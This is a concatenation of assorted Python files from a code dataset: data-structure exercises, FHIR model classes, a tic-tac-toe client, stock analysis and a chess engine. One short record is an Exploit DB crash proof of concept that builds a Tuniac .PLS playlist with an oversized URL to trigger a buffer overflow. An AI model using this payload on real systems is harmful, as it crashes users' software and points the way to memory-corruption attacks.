def remove(self):\r\n assert self.primeiro != None, \"Rua já está vazia.\"\r\n self.primeiro = self.primeiro.proximo\r\n if self.primeiro == None:\r\n self.ultimo = None\r\n\r\n#Pilha usando estrutura encadeada\r\nclass Pilha:\r\n def __init__(self):\r\n self.topo = None\r\n #Imprime a pilha numa representação de string\r\n def __repr__(self):\r\n return \"[\" + str(self.topo) + \"]\"\r\n\r\n def insere(self, novo_dado):\r\n \r\n # Cria um novo nodo com o dado a ser armazenado.\r\n novo_nodo = Nodo2(novo_dado)\r\n \r\n # Faz com que o novo nodo seja o topo da pilha.\r\n novo_nodo.anterior = self.topo\r\n \r\n # Faz com que a cabeça da lista referencie o novo nodo.\r\n self.topo = novo_nodo\r\n \r\n\r\n def remove(self):\r\n\r\n assert self.topo, \"Impossível remover valor de pilha vazia.\"\r\n\r\n self.topo = self.topo.anterior\r\n\r\n#Cria uma fila\r\npista1 = Fila()\r\npista2 = Fila()\r\n\r\n#Distribuição de 10 carros de maneira aleatória entra as pistas 1 e 2\r\nfor i in range(10):\r\n x=random.randint(1,2)\r\n \r\n if x==1:\r\n pista1.insere(f\"\\033[1;96mcarro {i+1}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {i+1} entrando na pista {x}:\t\\033[0;0m {pista1}\")\r\n time.sleep(random.randint(1,5)) #Tempo aleatório de 0 a 5 segundos para os carros entrarem nas pistas\r\n \r\n else:\r\n pista2.insere(f\"\\033[1;95mcarro {i+1}\\033[1;95m\")\r\n print(f\"\\033[0;0mCarro {i+1} entrando na pista {x}:\t\\033[0;0m {pista2}\")\r\n time.sleep(random.randint(1,5))\r\n \r\nprint('\\n') \r\n\r\n#While \"master\", condição que faz os semáforos 1 e 2 funcionarem até que ambas as filas estejam vazias\r\nwhile True: \r\n sinal1=True\r\n sinal2=True\r\n \r\n count = 0\r\n while sinal1: #Semáforo pista 1\r\n\r\n if count < 5: #condição menor que 5 conta os 10 segundos com o sinal verde, pois para os carros saírem leva-se 2 segundos cada. \r\n #Sendo assim, é permitido apenas 5 carros saírem da fila a cada vez que o sinal abre já que 2*5=10.\r\n print(\"\\033[42;1m--green light on (Semáforo 1)--\\033[0m\")\r\n if pista1.primeiro != None: #condição que verifica se a pista1 está vazia, se não, o primeiro da fila é liberado.\r\n time.sleep(2)\r\n pista1.remove()\r\n print(f\"Carro saiu da pista 1: {pista1}\")\r\n \r\n elif count < 10: #condição que representa o sinal vermelho\r\n print(\"\\n\\033[41;1m--red light on (Semáforo 1)--\\033\\n[0m\")\r\n break #caso true, o brake indica que o sinal2 foi aberto e este foi fechado.\r\n \r\n time.sleep(1) #tempo para visualização no terminal.\r\n count += 1 #incrementa-se o contador.\r\n \r\n count = 0 \r\n while sinal2: #Semáforo pista 2\r\n \r\n if count < 5: #condição menor que 5 conta os 10 segundos com o sinal verde, pois para os carros saírem leva-se 2 segundos cada. \r\n #Sendo assim, é permitido apenas 5 carros saírem da fila a cada vez que o sinal abre já que 2*5=10.\r\n print(\"\\033[42;1m--green light on (Semáforo 2)--\\033[0m\")\r\n if pista2.primeiro != None: #condição que verifica se a pista2 está vazia, se não, o primeiro da fila é liberado.\r\n time.sleep(2)\r\n pista2.remove()\r\n print(f\"Carro saiu da pista 2: {pista2}\")\r\n \r\n elif count < 10: #condição que representa o sinal vermelho\r\n print(\"\\n\\033[41;1m--red light on (Semáforo 2)--\\033\\n[0m\")\r\n break #caso true, o brake indica que o sinal1 foi aberto e este foi fechado\r\n \r\n time.sleep(1) #tempo para visualização no terminal\r\n count += 1 #incremetando o contador\r\n \r\n if pista1.primeiro == None: #após o break do sinal2 o interpretador afere com o IF se ambas as pistas estão vazias\r\n if pista2.primeiro == None:\r\n print(\"\\033[1;33m--Todos os carros foram em direção ao estacionamento--\\n\\033[1;33m\")\r\n break #break que encerra o While \"master\", indicando que todos os carros saíram em direção ao estacionamento.\r\n\r\n#Cria Pilha\r\nestacionamento = Pilha()\r\n\r\n#Insere os carros no estacionamento,vale ressaltar que independente do nº do mesmo no estacionameto, aqui esse é estabelecido de acordo com a ordem de chegada.\r\nfor i in range(5):\r\n estacionamento.insere(f\"\\033[1;34mcarro {i+1}\\033[1;34m\")\r\n print(f\"\\033[0;0mCarro {i+1} entrando no estacionamento: \\033[0;0m{estacionamento}\")\r\n time.sleep(2)\r\n \r\nprint('\\n')\r\n\r\nprint(\"\\033[1;33m--O estacionamento está lotado.--\\n\\033[1;33m\")\r\nprint(estacionamento)\r\n\r\n#Diz qual dos carros sera removido aleatoriamente\r\ny=random.randint(1,5)\r\nprint(f\"\\033[0;0mO carro a ser removido é o carro\\033[0;0m {y}\\n\")\r\n\r\n#Remove o conjunto de carros e os devolve a pista 1 de acordo com o valor aleatorio gerado\r\nif(y == 1):\r\n print(\"Os carros a serem removidos antes do carro 1 são [carro2 -> carro3 -> carro4 -> carro5].\")\r\n for i in range(5):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {i+1}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {i+1} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 2):\r\n print(\"Os carros a serem removidos antes do carro 2 são [carro3 -> carro4 -> carro5].\")\r\n for i in range(4):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {i+3}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {i+3} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 3):\r\n print(\"Os carros a serem removidos antes do carro 3 são [carro4 -> carro5].\")\r\n for i in range(3):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5-i}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5-i} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelif(y == 4):\r\n print(\"O carro a ser removido antes do carro 4 é o [carro5].\")\r\n for i in range(2):\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5-i}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5-i} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\nelse:\r\n print(\"O carro 5 é o último então pode sair direto.\")\r\n estacionamento.remove()\r\n time.sleep(2)\r\n pista1.insere(f\"\\033[1;96mcarro {5}\\033[1;96m\")\r\n print(f\"\\033[0;0mCarro {5} voltou para a pista 1:\\033[0;0m {pista1}\")\r\n\r\n","repo_name":"JPedroo/Estrutura-de-dados_FIFO-Fila-LIFO-Pilha-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8072,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"44087053308","text":"from .fhirbase import fhirbase\n\n\nclass ImagingManifest(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n resourceType: This is a ImagingManifest resource\n identifier: Unique identifier of the DICOM Key Object Selection (KOS)\n that this resource represents.\n patient: A patient resource reference which is the patient subject of\n all DICOM SOP Instances in this ImagingManifest.\n authoringTime: Date and time when the selection of the referenced\n instances were made. It is (typically) different from the creation\n date of the selection resource, and from dates associated with the\n referenced instances (e.g. capture time of the referenced image).\n author: Author of ImagingManifest. It can be a human author or a\n device which made the decision of the SOP instances selected. For\n example, a radiologist selected a set of imaging SOP instances to\n attach in a diagnostic report, and a CAD application may author a\n selection to describe SOP instances it used to generate a detection\n conclusion.\n description: Free text narrative description of the ImagingManifest.\n The value may be derived from the DICOM Standard Part 16, CID-7010\n descriptions (e.g. Best in Set, Complete Study Content). Note that\n those values cover the wide range of uses of the DICOM Key Object\n Selection object, several of which are not supported by\n ImagingManifest. Specifically, there is no expected behavior\n associated with descriptions that suggest referenced images be removed\n or not used.\n study: Study identity and locating information of the DICOM SOP\n instances in the selection.\n \"\"\"\n\n __name__ = 'ImagingManifest'\n\n def __init__(self, dict_values=None):\n self.resourceType = 'ImagingManifest'\n # type: str\n # possible values: ImagingManifest\n\n self.patient = None\n # reference to Reference: identifier\n\n self.authoringTime = None\n # type: str\n\n self.author = None\n # reference to Reference: identifier\n\n self.description = None\n # type: str\n\n self.study = None\n # type: list\n # reference to ImagingManifest_Study\n\n self.identifier = None\n # reference to Identifier\n\n if dict_values:\n self.set_attributes(dict_values)\n self.assert_type()\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'author'},\n\n {'parent_entity': 'ImagingManifest_Study',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'study'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'patient'},\n\n {'parent_entity': 'Identifier',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest',\n 'child_variable': 'identifier'},\n ]\n\n\nclass ImagingManifest_Study(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n uid: Study instance UID of the SOP instances in the selection.\n imagingStudy: Reference to the Imaging Study in FHIR form.\n endpoint: The network service providing access (e.g., query, view, or\n retrieval) for the study. See implementation notes for information\n about using DICOM endpoints. A study-level endpoint applies to each\n series in the study, unless overridden by a series-level endpoint with\n the same Endpoint.type.\n series: Series identity and locating information of the DICOM SOP\n instances in the selection.\n \"\"\"\n\n __name__ = 'ImagingManifest_Study'\n\n def __init__(self, dict_values=None):\n self.uid = None\n # type: str\n\n self.imagingStudy = None\n # reference to Reference: identifier\n\n self.endpoint = None\n # type: list\n # reference to Reference: identifier\n\n self.series = None\n # type: list\n # reference to ImagingManifest_Series\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'endpoint'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'imagingStudy'},\n\n {'parent_entity': 'ImagingManifest_Series',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest_Study',\n 'child_variable': 'series'},\n ]\n\n\nclass ImagingManifest_Series(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n uid: Series instance UID of the SOP instances in the selection.\n endpoint: The network service providing access (e.g., query, view, or\n retrieval) for this series. See implementation notes for information\n about using DICOM endpoints. A series-level endpoint, if present, has\n precedence over a study-level endpoint with the same Endpoint.type.\n instance: Identity and locating information of the selected DICOM SOP\n instances.\n \"\"\"\n\n __name__ = 'ImagingManifest_Series'\n\n def __init__(self, dict_values=None):\n self.uid = None\n # type: str\n\n self.endpoint = None\n # type: list\n # reference to Reference: identifier\n\n self.instance = None\n # type: list\n # reference to ImagingManifest_Instance\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n\n def get_relationships(self):\n\n return [\n {'parent_entity': 'ImagingManifest_Instance',\n 'parent_variable': 'object_id',\n 'child_entity': 'ImagingManifest_Series',\n 'child_variable': 'instance'},\n\n {'parent_entity': 'Reference',\n 'parent_variable': 'identifier',\n 'child_entity': 'ImagingManifest_Series',\n 'child_variable': 'endpoint'},\n ]\n\n\nclass ImagingManifest_Instance(fhirbase):\n \"\"\"\n A text description of the DICOM SOP instances selected in the\n ImagingManifest; or the reason for, or significance of, the selection.\n\n Args:\n sopClass: SOP class UID of the selected instance.\n uid: SOP Instance UID of the selected instance.\n \"\"\"\n\n __name__ = 'ImagingManifest_Instance'\n\n def __init__(self, dict_values=None):\n self.sopClass = None\n # type: str\n\n self.uid = None\n # type: str\n\n self.object_id = None\n # unique identifier for object class\n\n if dict_values:\n self.set_attributes(dict_values)\n","repo_name":"thakur-amrita/Cardea","sub_path":"cardea/fhir/ImagingManifest.py","file_name":"ImagingManifest.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"3508696515","text":"class Context(object):\n \"\"\"Class to hold context about a the current code review and checkout.\"\"\"\n def __init__(self, rietveld, checkout, status, server_hooks_missing=False):\n \"\"\"\n Args:\n rietveld: Instance of rietveld.Rietveld.\n checkout: Instance of checkout.SvnCheckout\n status: Instance of async_push.AsyncPush.\n server_hooks_missing: True if the project's SVN repository does not have\n server-side hooks configured.\n \"\"\"\n self.rietveld = rietveld\n self.checkout = checkout\n self.status = status\n self.server_hooks_missing = server_hooks_missing\n","repo_name":"sunny-bay/chromium30","sub_path":"commit-queue/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40251341867","text":"n = int(input())\nnums = list(map(int, input().split()))\n\n# Top Down, TC: O(N) SC: O(N) + O(N) (Recursion stack with dp array)\ndp1 = [-1] * n\ndef topDown(idx):\n if idx == n-1: return nums[idx]\n if idx >= n: return 0\n if dp1[idx] != -1: return dp1[idx]\n\n pick = nums[idx] + topDown(idx+2)\n not_pick = topDown(idx+1)\n return max(pick, not_pick)\n\n# print(topDown(0))\n\n# Top Down, TC: O(N) SC: O(N)\ndef bottomUp():\n dp2 = [-1] * n\n dp2[-1] = nums[-1]\n for i in range(n-2, -1, -1):\n pick = nums[i]\n if i+2 < n:\n pick += dp2[i+2]\n not_pick = dp2[i+1]\n dp2[i] = max(pick, not_pick) \n return dp2[0]\n\n# print(bottomUp())\n\n# Top Down, TC: O(N) SC: O(1)\ndef bottomUpWithTabulation():\n prev = nums[-1]\n prev2 = 0\n\n for i in range(n-2, -1, -1):\n pick = nums[i]\n if i+2 < n:\n pick += prev2\n not_pick = prev\n curr = max(pick, not_pick)\n prev, prev2 = curr, prev\n return prev\n\nprint(bottomUpWithTabulation())","repo_name":"Naboni/Competitive-Programming","sub_path":"houseRobber.py","file_name":"houseRobber.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21154332556","text":"import time\nimport random\n\nprint(\"Try to influence the direction of the X on this line\")\nprint(\"----------X----------\")\ntime.sleep(0.4)\ndirection = input(\"Type 'positive' for right or 'negative' for left\\n\")\ndirection.lower()\nwhile direction !='positive' or direction !='negative': \n if direction == 'positive':\n print()\n break\n elif direction == 'negative':\n print()\n break\n else:\n print(\"Try to influence the outcome of random numbers.\")\n time.sleep(0.4)\n direction = input(\"Type 'positive' or 'negative'\\n\")\n\ntime.sleep(0.2)\nprint (\"You chose\", direction)\ntime.sleep(1)\nprint (\"Visualize your\", direction, \"energy.\")\ntime.sleep(1)\nprint (\"Get Ready!\")\ntime.sleep(0.5)\nprint(\"3\") \ntime.sleep(1)\nprint(\"2\") \ntime.sleep(1)\nprint(\"1\")\ntime.sleep(1)\nprint(\"Go\")\n\nposition = 10\nline = '-'*21\n\ndef adjustLine(roll):\n time.sleep(0.3)\n global position\n global line \n line = '-'*21\n line_list = list(line)\n position += roll\n line_list[ position] = 'X'\n line = \"\".join(line_list)\n return line\n\nfor x in range(10):\n print(adjustLine(1 if random.random() < 0.5 else -1))\n\ntime.sleep(0.4)\nprint(\"Calculating...\")\ntime.sleep(1)\nprint(\"..\")\ntime.sleep(1)\nif direction == 'positive' and position > 10 or direction == 'negative' and position < 10:\n print(\"You did it!\", \"\\nYour conscious efforts made the X move.\")\nelse:\n print(\"Your psychic powers need improvement!\")\n \n","repo_name":"johnschwarz/PsychicTest","sub_path":"PsyTest.py","file_name":"PsyTest.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74930025013","text":"import Pyro4\nimport os\nimport json\nimport base64\nimport client.model as modelMod\nimport typing as typ\n\nclass Client:\n def __init__(self, host, port, identifier = \"main-\"):\n self.host = host\n self.port = port\n self.identifier = identifier\n self.objects = dict()\n\n def Start(self, remoteObjects):\n for obj in remoteObjects:\n url = \"PYRONAME:%s%s@%s:%d\" % (self.identifier, obj, self.host, self.port)\n self.objects[obj] = Pyro4.Proxy(url)\n\n def GetObject(self, name):\n return self.objects[name]\n\n\nclass TicTacToeClient:\n\n def __init__(self, host: str, port: int, identifier=\"main-\", servers=[]):\n self.client = Client(host, port, identifier)\n self.servers = list()\n self.serverName = servers\n self.mainServer = None\n self.pawnType : int = None\n self.roomCode : int = None\n self.hashState : int = 0\n self.placementList : typ.Sequence[modelMod.Placement] = list()\n self.placementHistory : typ.Sequence[modelMod.Placement] = list()\n self.placementMap : typ.Dict[modelMod.Location, modelMod.Placement] = dict()\n self.refindServer(servers)\n\n def refindServer(self, servers: typ.Sequence[str]):\n self.client.Start(servers)\n for server in servers:\n serverProxy = self.client.GetObject(server)\n self.servers.append(serverProxy)\n\n def getRoomCode(self):\n return self.roomCode\n\n def placePawn(self, posX: int, posY: int) -> bool:\n server = self.getActiveServer()\n resp = server.placePawn(self.roomCode, posX, posY, self.pawnType)\n resp = self._parseResponse(resp)\n return resp is self.pawnType\n\n def createRoom(self):\n server = self.getActiveServer()\n resp = server.createRoom()\n self.roomCode = self._parseResponse(resp)\n self.joinRoom(self.roomCode)\n\n def joinRoom(self, code: int):\n server = self.getActiveServer()\n resp = server.joinRoom(code)\n self.pawnType = self._parseResponse(resp)\n self.roomCode = code\n \n def synchronize(self):\n server = self.getActiveServer()\n resp = server.listPlacement(self.hashState)\n parsedResp = self._parseResponse(resp)\n self.hashState = parsedResp[\"hashState\"]\n for rawPlacement in parsedResp[\"placements\"]:\n roomCode = rawPlacement[\"room\"][\"code\"]\n pawnType = rawPlacement[\"type\"]\n xPos = rawPlacement[\"location\"][\"x\"]\n yPos = rawPlacement[\"location\"][\"y\"]\n location = modelMod.Location(xPos, yPos)\n placement = modelMod.Placement(roomCode, pawnType, location)\n if roomCode == self.roomCode:\n self.placementHistory.append(placement)\n self.placementList.append(placement)\n self.placementMap[location] = placement\n\n def getActiveServer(self):\n if self.mainServer is not None:\n try:\n self.mainServer._pyroBind()\n return self.mainServer\n except Exception as e:\n self.mainServer = None\n\n if self.mainServer is None:\n deleteList = list()\n for server in self.servers:\n try:\n server._pyroBind()\n self.mainServer = server\n except Exception as e:\n print(str(e))\n deleteList.append(server)\n pass\n for delete in deleteList:\n try:\n self.servers.remove(delete)\n except:\n pass\n \n if self.mainServer is not None:\n return self.mainServer\n \n self.refindServer(self.serverName)\n\n if self.mainServer is None:\n deleteList = list()\n for server in self.servers:\n try:\n server._pyroBind()\n self.mainServer = server\n except Exception as e:\n print(str(e))\n deleteList.append(server)\n pass\n for delete in deleteList:\n try:\n self.servers.remove(delete)\n except:\n pass\n \n if self.mainServer is not None:\n return self.mainServer\n raise Exception(\"Failed To Connect to all server\")\n\n def getPawnAtCoordinate(self, xPos: int, yPos: int):\n location = modelMod.Location(xPos, yPos)\n if location in self.placementMap:\n return self.placementMap[location]\n return None\n\n def getPawnType(self) -> int:\n return self.pawnType\n\n def _parseResponse(self, response: str) -> typ.Any:\n result : typ.Dict[str, typ.Any] = json.loads(response)\n if \"error\" in result:\n raise Exception(result[\"error\"])\n return result[\"response\"]\n\n def getPlacementHistory(self) -> typ.Sequence[modelMod.Placement]:\n return self.placementHistory\n \n def getPlacement(self) -> typ.Sequence[modelMod.Placement]:\n return self.placementList","repo_name":"firmanmm/tic-tac-royale","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32579765838","text":"#!/usr/bin/env python\n# Tuniac v.090517c (.PLS) Crash PoC\n# By : zAx\n# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download\n\nbuffer = (\"[playlist]\\x0ANumberOfEntries=1\\x0AFile1=http://\" + \"\\x41\" * (10000));\n\nf = open('Crash_Poc.PLS','w');\nf.write(buffer);\nf.close();\n\n# milw0rm.com [2009-09-14]","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/9671.py","file_name":"9671.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"10690843180","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\n\n\n# %%\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\nfrom pandas_datareader import DataReader\n\n\n# %%\nfrom datetime import datetime\n\n\n# %%\nfrom __future__ import division\n\n# %% [markdown]\n# Congrats on finishing the Stock Market Data Analysis project! Here are some additional quesitons and excercises for you to do:\n# \n# 1.) Estimate the values at risk using both methods we learned in this project for a stock not related to technology.\n# \n# 2.) Build a practice portfolio and see how well you can predict you risk values with real stock information!\n# \n# 3.) Look further into correlatino of two stocks and see if that gives you any insight into future possible stock prices.\n\n# %%\nfood_list = ['WEAT','SOYB','CORN','CANE']\n\n\n# %%\nend = datetime.now()\n\nstart = datetime(end.year-1, end.month, end.day)\n\n\n# %%\nfor stock in food_list:\n globals()[stock] = DataReader(stock,data_source='yahoo',start=start,end=end)\n\n\n# %%\nWEAT.head()\n\n\n# %%\n# Moving Average\nma_day = [10,20,50]\n\nfor ma in ma_day:\n column_name = \"MA for %s days\" %(str(ma))\n WEAT[column_name] = WEAT['Adj Close'].rolling(ma).mean()\n\n\n# %%\nWEAT[['Adj Close','MA for 10 days','MA for 20 days','MA for 50 days']].plot(subplots=False,figsize=(10,4))\n\n\n# %%\nclosing_df = DataReader(food_list,'yahoo',start,end)['Adj Close']\n\n\n# %%\nclosing_df.head()\n\n\n# %%\nfood_rets = closing_df.pct_change()\n\n\n# %%\nfood_rets.head()\n\n\n# %%\nsns.jointplot(x='WEAT',y='CORN',data=food_rets,kind='scatter',color='seagreen')\n\n\n# %%\nsns.pairplot(food_rets.dropna())\n\n\n# %%\nreturns_fig = sns.PairGrid(food_rets.dropna())\n\nreturns_fig.map_upper(plt.scatter,color='purple')\n\nreturns_fig.map_lower(sns.kdeplot,cmap='cool_d')\n\nreturns_fig.map_diag(plt.hist,bins=30)\n\n\n# %%\nreturns_fig = sns.PairGrid(closing_df)\n\nreturns_fig.map_upper(plt.scatter,color='purple')\n\nreturns_fig.map_lower(sns.kdeplot,cmap='cool_d')\n\nreturns_fig.map_diag(plt.hist,bins=30)\n\n\n# %%\n# 1. Risk Analysis\nrets = food_rets.dropna()\n\n\n# %%\narea = np.pi*20\n\nplt.scatter(rets.mean(),rets.std(),s = area)\n\nplt.ylim([0.01,0.025])\nplt.xlim([-0.003,0.004])\n\nplt.xlabel('Expected Return')\nplt.ylabel('Risk')\n\nfor label, x, y in zip(rets.columns, rets.mean(), rets.std()):\n plt.annotate(\n label,\n xy= (x, y), xytext = (50, 50),\n textcoords = 'offset points', ha = 'right', va = 'bottom',\n arrowprops = dict(arrowstyle = '-', connectionstyle = 'arc3,rad=-0.3')\n )\n\n\n# %%\n# Predict future stock\ndays = 365\n\ndt = 1/days\n\nmu = rets.mean()['WEAT']\n\nsigma = rets.std()['WEAT']\n\n\n# %%\ndef stock_monte_carlo(start_price,days,mu,sigma):\n\n price = np.zeros(days)\n price[0] = start_price\n\n shock = np.zeros(days)\n drift = np.zeros(days)\n\n for x in range(1, days):\n\n shock[x] = np.random.normal(loc=mu*dt, scale=sigma*np.sqrt(dt))\n\n drift[x] = mu * dt\n\n price[x] = price[x-1] + (price[x-1] * (drift[x] + shock[x]))\n \n return price\n\n\n# %%\nWEAT.head()\n\n\n# %%\nstart_price = 5.42\n\n\n# %%\nruns = 10000\n\nsimulations = np.zeros(runs)\n\nfor run in range(runs):\n simulations[run] = stock_monte_carlo(start_price, days, mu, sigma)[days-1]\n\n\n# %%\nq = np.percentile(simulations, 1)\n\nplt.hist(simulations, bins=200)\n\n# Starting Price\nplt.figtext(0.6, 0.8, s='Start price: $%.2f' %start_price)\n# Mean ending price\nplt.figtext(0.6, 0.7, 'Mean final price: $%.2f' % simulations.mean())\n\n# Variance of the price (within 99% confidence interval)\nplt.figtext(0.6, 0.6, 'VaR(0.99): $%.2f' % (start_price - q,))\n\n# Display 1% quantile\nplt.figtext(0.15, 0.6, 'q(0.99): $%.2f' % q)\n\n# Plot a line at the 1% quantile result\nplt.axvline(x=q, linewidth=4, color='r')\n\n# Title\nplt.title(u'Final price distribution for Wheat Stock after %s days' % days, weight='bold')\n\n\n","repo_name":"abel672/python-data-analysis-visualization","sub_path":"Section-8-Example-Projects/01-Stock-Market-Analysis-Excercise.py","file_name":"01-Stock-Market-Analysis-Excercise.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72797012854","text":"\n\n#Define clases\nclass Board:\n '''\n Initial state of the board\n '''\n def __init__(self):\n self.board = [\n ['br', 'bn', 'bb', 'bq', 'bk', 'bb', 'bn', 'br'],\n ['bp', 'bp', 'bp', 'bp', 'bp', 'bp', 'bp', 'bp'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['wp', 'wp', 'wp', 'wp', 'wp', 'wp', 'wp', 'wp'],\n ['wr', 'wn', 'wb', 'wq', 'wk', 'wb', 'wn', 'wr'],\n ]\n self.white_to_move = True\n self.moves = []\n self.wk_position = (7, 4)\n self.bk_position = (0, 4)\n \n\n '''\n Takes a move and changes the state of the board making the move\n '''\n def make_move(self, move):\n self.board[move.start_row][move.start_col] = '--' #Changes the board state\n self.board[move.end_row][move.end_col] = move.piece_moved #Changes the board state\n self.white_to_move = not self.white_to_move #Changes the turn\n #Pawn promotion\n if move.end_row == 0 and move.piece_moved == 'wp':\n self.board[move.end_row][move.end_col] = 'wq'\n if move.end_row == 7 and move.piece_moved == 'bp':\n self.board[move.end_row][move.end_col] = 'bq'\n #Update kings position\n if move.piece_moved == 'wk':\n self.wk_position = (move.end_row, move.end_col)\n print(self.wk_position)\n if move.piece_moved == 'bk':\n self.bk_position = (move.end_row, move.end_col)\n self.moves.append(move)\n \n '''\n Undo the last move\n '''\n def undo_move(self, move):\n self.board[move.start_row][move.start_col] = move.piece_moved #Changes the board state\n self.board[move.end_row][move.end_col] = move.piece_captured #Changes the board state\n self.white_to_move = not self.white_to_move #Changes the turn\n self.moves.pop()\n\n '''\n Gets all the legal moves considering checks\n '''\n def get_valid_moves(self):\n #Generate all legal moves\n legal_moves = self.get_legal_moves()\n #For each move make the move\n for i in range(len(legal_moves)-1, -1, -1):\n move = legal_moves[i]\n self.make_move(move)\n #Generate all legal moves for the oponent\n oponents_moves = self.get_legal_moves()\n #See if any of them atack our king\n self.white_to_move = not self.white_to_move\n if self.in_check():\n legal_moves.remove(legal_moves[i]) #Remove move\n self.white_to_move = not self.white_to_move\n self.undo_move(move)\n return legal_moves \n\n '''\n Determin if a player is in check\n '''\n def in_check(self):\n if self.white_to_move:\n return self.square_under_attack(self.wk_position[0], self.wk_position[1])\n else:\n return self.square_under_attack(self.bk_position[0], self.bk_position[1])\n\n '''\n Determin if oponent can atack the square r, c\n '''\n def square_under_attack(self, r, c):\n self.white_to_move = not self.white_to_move\n oponents_move = self.get_legal_moves()\n self.white_to_move = not self.white_to_move\n for move in oponents_move:\n if move.end_row == r and move.end_col == c:\n return True\n return False\n\n '''\n Gets all the legal moves\n '''\n def get_legal_moves(self):\n legal_moves = []\n for r in range(0, 8):\n for c in range(0, 8):\n color = self.board[r][c][0]\n if (color == 'w' and self.white_to_move) or (color == 'b' and not self.white_to_move):\n piece = self.board[r][c][1]\n if piece == 'p':\n self.get_pawn_moves(r, c, legal_moves)\n if piece == 'k':\n self.get_king_moves(r, c, legal_moves)\n if piece == 'r':\n self.get_rook_moves(r, c, legal_moves)\n if piece == 'b':\n self.get_bishop_moves(r, c, legal_moves)\n if piece == 'q':\n self.get_queen_moves(r, c, legal_moves)\n if piece == 'n':\n self.get_knight_moves(r, c, legal_moves)\n return legal_moves\n\n def get_pawn_moves(self, row, col, legal_moves):\n if self.white_to_move:\n if self.board[row-1][col] == '--':\n legal_moves.append(Move((row, col), (row-1, col), self.board))\n if row == 6 and self.board[row-2][col] == '--' and self.board[row-1][col] == '--':\n legal_moves.append(Move((row, col), (row-2, col), self.board))\n try:\n if self.board[row-1][col-1] != '--' and self.board[row-1][col-1][0] != 'w':\n legal_moves.append(Move((row, col), (row-1, col-1), self.board))\n if self.board[row-1][col+1] != '--' and self.board[row-1][col+1][0] != 'w':\n legal_moves.append(Move((row, col), (row-1, col+1), self.board))\n except:\n pass\n else:\n if self.board[row+1][col] == '--':\n legal_moves.append(Move((row, col), (row+1, col), self.board))\n if row == 1 and self.board[row+2][col] == '--' and self.board[row+1][col] == '--':\n legal_moves.append(Move((row, col), (row+2, col), self.board))\n try:\n if self.board[row+1][col-1] != '--' and self.board[row+1][col-1][0] != 'b':\n legal_moves.append(Move((row, col), (row+1, col-1), self.board))\n if self.board[row+1][col+1] != '--' and 